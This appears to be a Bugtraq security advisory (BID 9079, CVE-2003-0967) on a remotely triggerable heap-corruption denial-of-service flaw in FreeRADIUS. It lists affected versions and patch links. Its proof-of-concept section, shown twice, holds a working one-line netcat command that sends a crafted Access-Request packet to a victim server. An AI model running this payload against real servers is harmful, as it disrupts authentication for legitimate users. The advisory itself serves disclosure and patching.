FreeRADIUS Tag Field Heap Corruption Vulnerability
BID:9079
Info
FreeRADIUS Tag Field Heap Corruption Vulnerability
| Bugtraq ID: | 9079 |
| Class: | Input Validation Error |
| CVE: |
CVE-2003-0967 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 20 2003 12:00AM |
| Updated: | Sep 10 2009 08:41PM |
| Credit: | Discovery credited to Evgeny Legerov. |
| Vulnerable: |
Redhat Enterprise Linux WS 5 Redhat Enterprise Linux ES 3 Redhat Enterprise Linux Desktop 5 client Redhat Enterprise Linux AS 3 Redhat Enterprise Linux 5 server FreeRADIUS FreeRADIUS 1.1.7 FreeRADIUS FreeRADIUS 1.1.6 FreeRADIUS FreeRADIUS 1.1.5 FreeRADIUS FreeRADIUS 1.1.4 FreeRADIUS FreeRADIUS 1.1.3 FreeRADIUS FreeRADIUS 0.9.2 FreeRADIUS FreeRADIUS 0.9.1 FreeRADIUS FreeRADIUS 0.9 FreeRADIUS FreeRADIUS 0.8.1 FreeRADIUS FreeRADIUS 0.8 FreeRADIUS FreeRADIUS 0.5 FreeRADIUS FreeRADIUS 0.4 FreeRADIUS FreeRADIUS 0.3 FreeRADIUS FreeRADIUS 0.3 FreeRADIUS FreeRADIUS 0.2 |
| Not Vulnerable: |
FreeRADIUS FreeRADIUS 1.1.8 FreeRADIUS FreeRADIUS 0.9.3 |
Discussion
FreeRADIUS Tag Field Heap Corruption Vulnerability
FreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.
This issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.
This vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.
UPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.
FreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server.
This issue was initially reported as a vulnerability in how the software handles 'Tunnel-Password' attribute in Access-Request packets, but the issue turns out to have wider scope, affecting tag-field input in general.
This vulnerability affects FreeRADIUS 0.4.0 through 0.9.2.
UPDATE (September 9, 2009): This issue was fixed in 2003 but reintroduced later. FreeRADIUS 1.1.3 through 1.1.7 are also vulnerable.
Exploit / POC
FreeRADIUS Tag Field Heap Corruption Vulnerability
Attackers may exploit this issue using readily available commands.
The following example command is available:
bash-2.05$ echo -ne "\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x02" | nc -vu -w1 <victim> <port>
Attackers may exploit this issue using readily available commands.
The following example command is available:
bash-2.05$ echo -ne "\x01\x01\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x02" | nc -vu -w1 <victim> <port>
Solution / Fix
FreeRADIUS Tag Field Heap Corruption Vulnerability
Solution:
The vendor has released updates. Please see the references for details.
FreeRADIUS FreeRADIUS 0.2
FreeRADIUS FreeRADIUS 0.3
FreeRADIUS FreeRADIUS 0.3
FreeRADIUS FreeRADIUS 0.4
FreeRADIUS FreeRADIUS 0.5
FreeRADIUS FreeRADIUS 0.8
FreeRADIUS FreeRADIUS 0.8.1
FreeRADIUS FreeRADIUS 0.9
FreeRADIUS FreeRADIUS 0.9.1
FreeRADIUS FreeRADIUS 0.9.2
FreeRADIUS FreeRADIUS 1.1.3
FreeRADIUS FreeRADIUS 1.1.4
FreeRADIUS FreeRADIUS 1.1.5
FreeRADIUS FreeRADIUS 1.1.6
FreeRADIUS FreeRADIUS 1.1.7
Solution:
The vendor has released updates. Please see the references for details.
FreeRADIUS FreeRADIUS 0.2
-
FreeRADIUS freeradius-0.9.3.tar.gz
ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz
FreeRADIUS FreeRADIUS 0.3
-
FreeRADIUS freeradius-0.9.3.tar.gz
ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz
FreeRADIUS FreeRADIUS 0.3
-
FreeRADIUS freeradius-0.9.3.tar.gz
ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz
FreeRADIUS FreeRADIUS 0.4
-
FreeRADIUS freeradius-0.9.3.tar.gz
ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz
FreeRADIUS FreeRADIUS 0.5
-
Conectiva freeradius-0.5-377.i586.rpm
ftp://ul.conectiva.com.br/updates/1.0/RPMS.core/freeradius-0.5-377.i58 6.rpm -
Conectiva freeradius-devel-0.5-377.i586.rpm
ftp://ul.conectiva.com.br/updates/1.0/RPMS.core/freeradius-devel-0.5-3 77.i586.rpm -
FreeRADIUS freeradius-0.9.3.tar.gz
ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz
FreeRADIUS FreeRADIUS 0.8
-
FreeRADIUS freeradius-0.9.3.tar.gz
ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz
FreeRADIUS FreeRADIUS 0.8.1
-
FreeRADIUS freeradius-0.9.3.tar.gz
ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz
FreeRADIUS FreeRADIUS 0.9
-
FreeRADIUS freeradius-0.9.3.tar.gz
ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz
FreeRADIUS FreeRADIUS 0.9.1
-
FreeRADIUS freeradius-0.9.3.tar.gz
ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz
FreeRADIUS FreeRADIUS 0.9.2
-
Fedora freeradius-0.9.3-1.1.i386.rpm
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/i386 /freeradius-0.9.3-1.1.i386.rpm -
Fedora freeradius-debuginfo-0.9.3-1.1.i386.rpm
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/i386 /debug/freeradius-debuginfo-0.9.3-1.1.i386.rpm -
Fedora freeradius-mysql-0.9.3-1.1.i386.rpm
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/i386 /freeradius-mysql-0.9.3-1.1.i386.rpm -
Fedora freeradius-postgresql-0.9.3-1.1.i386.rpm
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/i386 /freeradius-postgresql-0.9.3-1.1.i386.rpm -
Fedora freeradius-unixODBC-0.9.3-1.1.i386.rpm
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/i386 /freeradius-unixODBC-0.9.3-1.1.i386.rpm -
FreeRADIUS freeradius-0.9.3.tar.gz
ftp://ftp.freeradius.org/pub/radius/freeradius-0.9.3.tar.gz
FreeRADIUS FreeRADIUS 1.1.3
-
FreeRADIUS freeradius-1.1.8.tar.bz2
ftp://ftp.freeradius.org/pub/freeradius/freeradius-1.1.8.tar.bz2
FreeRADIUS FreeRADIUS 1.1.4
-
FreeRADIUS freeradius-1.1.8.tar.bz2
ftp://ftp.freeradius.org/pub/freeradius/freeradius-1.1.8.tar.bz2
FreeRADIUS FreeRADIUS 1.1.5
-
FreeRADIUS freeradius-1.1.8.tar.bz2
ftp://ftp.freeradius.org/pub/freeradius/freeradius-1.1.8.tar.bz2
FreeRADIUS FreeRADIUS 1.1.6
-
FreeRADIUS freeradius-1.1.8.tar.bz2
ftp://ftp.freeradius.org/pub/freeradius/freeradius-1.1.8.tar.bz2
FreeRADIUS FreeRADIUS 1.1.7
-
FreeRADIUS freeradius-1.1.8.tar.bz2
ftp://ftp.freeradius.org/pub/freeradius/freeradius-1.1.8.tar.bz2
References
FreeRADIUS Tag Field Heap Corruption Vulnerability
References:
References:
- Bug 521912 �?? FreeRADIUS: Missing check for Tunnel-Password attributes with zero (Jan Lieskovsky)
- CVE Request -- FreeRADIUS 1.1.8 (Jan Lieskovsky)
- Fix crash on Tunnel-Password attributes with zero length (alandekok)
- FreeRADIUS Homepage (FreeRADIUS)
- RHSA-2003:386-07 Updated FreeRADIUS packages fix security issue (Red Hat)
- Version 1.1.8 has been released (Alan DeKok)
- Remote DoS in FreeRADIUS, all versions. ("Alan DeKok"
)